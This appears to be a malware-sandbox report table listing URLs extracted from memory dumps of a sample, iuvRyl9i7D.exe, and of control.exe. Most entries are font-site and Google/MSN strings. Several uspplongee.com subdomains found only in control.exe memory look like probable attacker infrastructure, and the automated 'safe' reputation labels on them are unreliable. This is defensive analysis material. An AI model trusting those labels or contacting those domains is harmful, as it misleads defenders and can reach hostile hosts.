http://www.jiyu-kobo.co.jp/2	iuvRyl9i7D.exe, 00000000.00000003.249208046.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249125283.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249059165.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249031929.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://penjian.uspplongee.com/	control.exe, 00000015.00000002.511351963.0000000004C72000.00000004.10000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.jiyu-kobo.co.jp/ana	iuvRyl9i7D.exe, 00000000.00000003.249208046.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248902113.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248700253.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249125283.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248461189.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248822952.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248356549.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248834441.0000000005F2F000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248606868.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248399900.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249059165.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249031929.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248498321.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com:	iuvRyl9i7D.exe, 00000000.00000003.251614077.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.250474688.0000000005F2F000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251650593.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.250566915.0000000005F2F000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.250528449.0000000005F2F000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251457232.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251042075.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.250842535.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251521721.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251241602.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251088919.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251421233.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.250772094.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251278974.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251544135.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.250632388.0000000005F2F000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251220537.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251756044.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.250598952.0000000005F2F000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.250706232.0000000005F33000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251002977.0000000005F30000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.galapagosdesign.com/DPlease	iuvRyl9i7D.exe, 00000000.00000002.300790084.0000000007112000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.comgrito	iuvRyl9i7D.exe, 00000000.00000003.257393537.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.258690878.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.257336256.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.256890295.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.256747694.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.258625946.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.256684499.0000000005F30000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.ascendercorp.com/typedesigners.html	iuvRyl9i7D.exe, 00000000.00000003.249208046.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249250555.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249125283.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249091958.0000000005F0B000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.jiyu-kobo.co.jp/(	iuvRyl9i7D.exe, 00000000.00000003.249333783.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249208046.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249250555.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248902113.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248700253.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249125283.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248822952.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248834441.0000000005F2F000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248606868.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249059165.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249317666.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249300336.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249031929.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248498321.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://genzi.uspplongee.com/	control.exe, 00000015.00000002.511351963.0000000004C72000.00000004.10000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.urwpp.deDPlease	iuvRyl9i7D.exe, 00000000.00000002.300790084.0000000007112000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.zhongyicts.com.cn	iuvRyl9i7D.exe, 00000000.00000003.247623435.0000000005F2F000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.247629329.0000000005F31000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000002.300790084.0000000007112000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	iuvRyl9i7D.exe, 00000000.00000002.296276978.0000000002D71000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000002.296852767.0000000002E29000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fontbureau.com.TTF	iuvRyl9i7D.exe, 00000000.00000003.252787080.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252731012.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252813572.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252591924.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252619646.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252863483.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252648890.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252707963.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252670155.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252833388.0000000005F30000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.msn.com/de-ch/?ocid=iehp4	control.exe, 00000015.00000002.509355844.0000000000A24000.00000004.00000020.00020000.00000000.sdmp	false		high
https://consent.google.com/setpc=s&uxe=4421591	control.exe, 00000015.00000002.509465668.0000000000A4C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000015.00000003.434675742.0000000000A4A000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.galapagosdesign.com/	iuvRyl9i7D.exe, 00000000.00000003.253807709.0000000005F30000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.jiyu-kobo.co.jp/U	iuvRyl9i7D.exe, 00000000.00000003.249333783.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249208046.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249250555.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249125283.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249059165.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249317666.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249300336.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249031929.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://gonglang.uspplongee.com/	control.exe, 00000015.00000002.511351963.0000000004C72000.00000004.10000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.google.com/?gws_rd=ssl	control.exe, 00000015.00000002.509355844.0000000000A24000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.google.com/?gws_rd=sslLMEMh	control.exe, 00000015.00000003.434675742.0000000000A4A000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.fontbureau.com/designers/frere-user.htmlZ	iuvRyl9i7D.exe, 00000000.00000003.251295969.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251345771.0000000005F30000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.galapagosdesign.com/staff/dennis.html	iuvRyl9i7D.exe, 00000000.00000003.253906964.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.253976291.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.253867962.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.254019876.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.254002805.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.253846416.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.253807709.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.254048216.0000000005F30000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://qunben.uspplongee.com/	control.exe, 00000015.00000002.511351963.0000000004C72000.00000004.10000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.comlic	iuvRyl9i7D.exe, 00000000.00000003.251899663.0000000005F30000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.comI.TTF:	iuvRyl9i7D.exe, 00000000.00000003.252077012.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252113020.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.253383810.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.253027717.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.253224001.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252787080.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252731012.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.253128451.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252154816.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252813572.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.253153122.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.253083922.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.253314080.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252591924.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.253110391.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252619646.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252863483.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252961013.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252486470.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252226605.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.253363848.0000000005F30000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://consent.google.com/?hl=en-GB&origin=https://www.google.com&continue=https://www.google.com/?	control.exe, 00000015.00000002.509465668.0000000000A4C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000015.00000003.434675742.0000000000A4A000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000015.00000002.509355844.0000000000A24000.00000004.00000020.00020000.00000000.sdmp	false		high
https://contextual.media.net/checksync.php&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C	control.exe, 00000015.00000003.434675742.0000000000A4A000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.google.com/favicon.ico	control.exe, 00000015.00000003.434675742.0000000000A4A000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000015.00000002.509355844.0000000000A24000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.carterandcone.coml	iuvRyl9i7D.exe, 00000000.00000002.300790084.0000000007112000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://randu.uspplongee.com/	control.exe, 00000015.00000002.511351963.0000000004C72000.00000004.10000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.jiyu-kobo.co.jp/y	iuvRyl9i7D.exe, 00000000.00000003.249333783.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249208046.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249250555.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248902113.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248700253.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249125283.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248461189.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248822952.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248234193.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248356549.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248834441.0000000005F2F000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248606868.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248399900.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249059165.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249317666.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249300336.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249031929.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248498321.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248315923.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.founder.com.cn/cn.	iuvRyl9i7D.exe, 00000000.00000003.247148991.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.jiyu-kobo.co.jp/Y0(	iuvRyl9i7D.exe, 00000000.00000003.248606868.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248498321.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.com/designers/frere-user.html	iuvRyl9i7D.exe, 00000000.00000002.300790084.0000000007112000.00000004.00000800.00020000.00000000.sdmp	false		high
http://en.wi5	iuvRyl9i7D.exe, 00000000.00000003.247473983.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://shangeng.uspplongee.com/	control.exe, 00000015.00000002.511351963.0000000004C72000.00000004.10000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.jiyu-kobo.co.jp/r	iuvRyl9i7D.exe, 00000000.00000003.248461189.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248356549.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248399900.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.jiyu-kobo.co.jp/o	iuvRyl9i7D.exe, 00000000.00000003.249208046.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248902113.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248700253.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249125283.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248461189.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248822952.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248356549.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248834441.0000000005F2F000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248606868.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248399900.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249059165.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249031929.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248498321.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248315923.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.jiyu-kobo.co.jp/n	iuvRyl9i7D.exe, 00000000.00000003.248234193.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://consent.google.com/done8continue=https://www.google.com/?gws_rd%3Dssl&origin=https://www.goo	control.exe, 00000015.00000002.509355844.0000000000A24000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.founder.com.cn/cn5	iuvRyl9i7D.exe, 00000000.00000003.247148991.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://adservice.google.com/ddm/fls/i/src=2542116;type=2542116;cat=chom0;ord=8072167097284;gtm=2wg9	control.exe, 00000015.00000003.434675742.0000000000A4A000.00000004.00000020.00020000.00000000.sdmp	false		high
http://weimen.uspplongee.com/	control.exe, 00000015.00000002.511351963.0000000004C72000.00000004.10000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://consent.google.com/set?pc=s&uxe=4421591	control.exe, 00000015.00000002.509465668.0000000000A4C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000015.00000003.434675742.0000000000A4A000.00000004.00000020.00020000.00000000.sdmp	false		high
https://consent.google.com/set?pc=s&uxe=4421591LMEM	control.exe, 00000015.00000003.434675742.0000000000A4A000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.google.com/searchsource=hp&ei=djJ0X6TKCL6IjLsPqriogAY&q=chrome&oq=chrome&gs_lcp=CgZwc3kt	control.exe, 00000015.00000002.509355844.0000000000A24000.00000004.00000020.00020000.00000000.sdmp	false		high
http://mianta.uspplongee.com/	control.exe, 00000015.00000002.511351963.0000000004C72000.00000004.10000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.com/designersG	iuvRyl9i7D.exe, 00000000.00000002.300790084.0000000007112000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fontbureau.comFU	iuvRyl9i7D.exe, 00000000.00000003.251899663.0000000005F30000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.comsivao	iuvRyl9i7D.exe, 00000000.00000003.252113020.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.253027717.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252787080.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252731012.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252154816.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252813572.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252591924.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252619646.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252863483.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252961013.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252486470.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252226605.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252559654.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252648890.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252354121.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252707963.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252193043.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252670155.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252384451.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252833388.0000000005F30000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.carterandcone.comn-u	iuvRyl9i7D.exe, 00000000.00000003.247847880.0000000005F30000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.msn.com/?ocid=iehpLMEM	control.exe, 00000015.00000003.434675742.0000000000A4A000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.fontbureau.com/designers/?	iuvRyl9i7D.exe, 00000000.00000002.300790084.0000000007112000.00000004.00000800.00020000.00000000.sdmp	false		high
http://rechan.uspplongee.com/	control.exe, 00000015.00000002.511351963.0000000004C72000.00000004.10000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://wudie.uspplongee.com/	control.exe, 00000015.00000002.511351963.0000000004C72000.00000004.10000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.founder.com.cn/cn/bThe	iuvRyl9i7D.exe, 00000000.00000002.300790084.0000000007112000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://ogs.google.com/widget/callout?prid=19020392&pgid=19020380&puid=93eb0881ae9ec1db&origin=https	control.exe, 00000015.00000003.434675742.0000000000A4A000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.msn.com/de-ch/?ocid=iehpLMEMh	control.exe, 00000015.00000003.434675742.0000000000A4A000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.fontbureau.com/designers?	iuvRyl9i7D.exe, 00000000.00000002.300790084.0000000007112000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com/intl/en_uk/chrome/S	control.exe, 00000015.00000002.509355844.0000000000A24000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.google.com/searchW	control.exe, 00000015.00000002.509355844.0000000000A24000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.fontbureau.com/designersC	iuvRyl9i7D.exe, 00000000.00000003.252486470.0000000005F30000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com/chrome/static/images/favicons/favicon-16x16.png	control.exe, 00000015.00000003.434675742.0000000000A4A000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.tiro.com	iuvRyl9i7D.exe, 00000000.00000002.300790084.0000000007112000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designersV	iuvRyl9i7D.exe, 00000000.00000003.250474688.0000000005F2F000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.250510531.0000000005F2F000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.250493202.0000000005F2F000.00000004.00000800.00020000.00000000.sdmp	false		high
http://saoshui.uspplongee.com/	control.exe, 00000015.00000002.511351963.0000000004C72000.00000004.10000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.goodfont.co.kr	iuvRyl9i7D.exe, 00000000.00000002.300790084.0000000007112000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
